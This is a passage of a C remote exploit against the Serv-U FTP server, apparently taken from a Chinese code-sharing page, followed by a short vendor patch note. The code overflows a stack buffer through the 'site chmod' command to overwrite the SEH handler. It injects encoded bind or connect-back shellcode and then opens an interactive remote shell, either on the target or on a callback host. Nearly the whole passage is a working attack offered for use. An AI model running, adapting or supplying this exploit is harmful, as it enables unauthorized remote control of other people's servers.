📄 read it.txt
字号:
iType = atoi(argv[i+1]);
break;
case 'f':
iPort=atoi(argv[i+1]);
break;
case 'p':
pPass = argv[i+1];
break;
case 'u':
pUser=argv[i+1];
break;
case 'c':
cbHost=argv[i+1];
bCb=TRUE;
break;
case 's':
shport=atoi(argv[i+1]);
break;
case 'd':
if(argv[i+1][0] != '/')
strcpy(szDirectory, "/");
strncat(szDirectory, argv[i+1], sizeof(szDirectory)-0x20);
if(szDirectory[strlen(szDirectory)-1] != '/')
strcat(szDirectory, "/");
// correct the directory len
for(j=0;j<(strlen(szDirectory)-1)%8;j++)
strcat(szDirectory, "x");
//printf("%d:%s\r\n", strlen(szDirectory), szDirectory);
seh_offset = seh_offset - strlen(szDirectory)+1;
break;
}
}
if((!ip) || (!user) || (!pass))
{
usage(argv[0]);
printf("[-] Invalid parameter.\n");
return;
}
if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
{
usage(argv[0]);
printf("[-] Invalid type.\n");
return;
}
if(iPort <0 || iPort >65535 || shport <0 || shport > 65535)
{
usage(argv[0]);
printf("[-] Invalid port.\n");
return;
}
_snprintf(user, sizeof(user)-1, "USER %s\r\n", pUser);
user[sizeof(user)-1]='\0';
_snprintf(pass, sizeof(pass)-1, "PASS %s\r\n", pPass);
pass[sizeof(pass)-1]='\0';
szSend[0] = user; //user
szSend[1] = pass; //pass
szSend[2] = penetrate; //pentrate
szSend[3] = szCommand; //shellcode
// Penetrate through the firewall.
if(bCb && shport > 1024)
{
strncpy(cbHost2, cbHost, 20);
for(i=0;i<strlen(cbHost); i++)
{
if(cbHost[i] == '.')
cbHost2[i] = ',';
}
sprintf(penetrate, "PORT %s,%d,%d\r\n", cbHost2, shport/256, shport%256);
//printf("%s", penetrate);
}
else
{
sprintf(penetrate,"TYPE I\r\n");
}
// fill the "site chmod" command
strcpy(szCommand, "site chmod 777 ");
// fill the directory
if(szDirectory[0])
strcat(szCommand, szDirectory);
// fill the egg
for(i=0;i<seh_offset%8;i++)
strcat(szCommand, "\x90");
//strcat(szCommand, "BBBB");
// fill the seh
for(i=0;i<=(seh_offset/8)*8+0x20;i+=8)
{
strcat(szCommand, JMP_OVER);
memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4);
}
// fill the decode
strcat(szCommand, decode);
// fill the shellcode start sign
strcat(szCommand, sc_start);
// fill the shellcode
if(bCb)
{
// connectback shellcode
shport2 = htons(shport)^(u_short)0x9393;
cbip = inet_addr(cbHost)^0x93939393;
memcpy(&cbsc[PORT_OFFSET], &shport2, 2);
memcpy(&cbsc[IP_OFFSET], &cbip, 4);
strcat(szCommand, cbsc);
}
else
{
// bind shellcode
shport2 = htons(shport)^(u_short)0x9393;
memcpy(&sc[BIND_OFFSET], &shport2, 2);
strcat(szCommand, sc);
}
// fill the shellcode end sign
strcat(szCommand, sc_end);
// send end
strcat(szCommand, "\r\n");
if(strlen(szCommand) >= sizeof(szCommand))
{
printf("[-] stack buffer overflow.\n");
return;
}
// printf("send size %d:%s", strlen(szCommand), szCommand);
__try
{
if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
{
printf("[-] WSAStartup error:%d\n", WSAGetLastError());
__leave;
}
s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(s == INVALID_SOCKET)
{
printf("[-] Create socket failed:%d",GetLastError());
__leave;
}
sa.sin_family=AF_INET;
sa.sin_port=htons((USHORT)iPort);
sa.sin_addr.S_un.S_addr=inet_addr(ip);
setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));
iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa));
if(iErr == SOCKET_ERROR)
{
printf("[-] Connect to %s:%d error:%d\n", ip, iPort, GetLastError());
__leave;
}
printf("[+] Connect to %s:%d success.\n", ip, iPort);
if(bCb)
{
Sleep(500);
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family=AF_INET;
server.sin_addr.S_un.S_addr=inet_addr(cbHost);
//server.sin_addr.s_addr=INADDR_ANY;
server.sin_port=htons((unsigned short)shport);
setsockopt(s2,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));
Reuse = 1;
setsockopt(s2, SOL_SOCKET, SO_REUSEADDR, (char*)&Reuse, sizeof(Reuse));
if(bind(s2,(LPSOCKADDR)&server,sizeof(server))==SOCKET_ERROR)
{
printf("[-] Bind port on %s:%d error.\n", cbHost, shport);
printf("[-] You must run nc get the shell.\n");
bLocal = FALSE;
//closesocket(s2);
//__leave;
}
else
{
printf("[+] Bind port on %s:%d success.\n", cbHost, shport);
listen(s2, 1);
}
}
for(i=0;i<sizeof(szSend)/sizeof(szSend[0]);i++)
{
memset(szRecvBuff, 0, sizeof(szRecvBuff));
iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0);
if(iErr == SOCKET_ERROR)
{
printf("[-] Recv buffer error:%d.\n", WSAGetLastError());
__leave;
}
printf("[+] Recv: %s", szRecvBuff);
if(szRecvBuff[0] == '5')
{
printf("[-] Server return a error Message.\r\n");
__leave;
}
iErr = send(s, szSend[i], strlen(szSend[i]),0);
if(iErr == SOCKET_ERROR)
{
printf("[-] Send buffer error:%d.\n", WSAGetLastError());
__leave;
}
if(i==sizeof(szSend)/sizeof(szSend[0])-1)
printf("[+] Send shellcode %d bytes.\n", iErr);
else
printf("[+] Send: %s", szSend[i]);
}
printf("[+] If you don't have a shell it didn't work.\n");
if(bCb)
{
if(bLocal)
{
printf("[+] Wait for shell...\n");
len = sizeof(client);
s3 = accept(s2, (struct sockaddr*)&client, &len);
if(s3 != INVALID_SOCKET)
{
printf("[+] Exploit success! Good luck! :)\n");
printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
shell(s3);
}
}
}
else
{
printf("[+] Connect to shell...\n");
Sleep(1000);
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family = AF_INET;
server.sin_port = htons(shport);
server.sin_addr.s_addr=inet_addr(ip);
ret = connect(s2, (struct sockaddr *)&server, sizeof(server));
if(ret!=0)
{
printf("[-] Exploit seem failed.\n");
__leave;
}
printf("[+] Exploit success! Good luck! :)\n");
printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
shell(s2);
}
}
__finally
{
if(s != INVALID_SOCKET) closesocket(s);
if(s2 != INVALID_SOCKET) closesocket(s2);
if(s3 != INVALID_SOCKET) closesocket(s3);
WSACleanup();
}
return;
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
RhinoSoft
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载Serv-U 5.0:
http://www.serv-u.com/
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -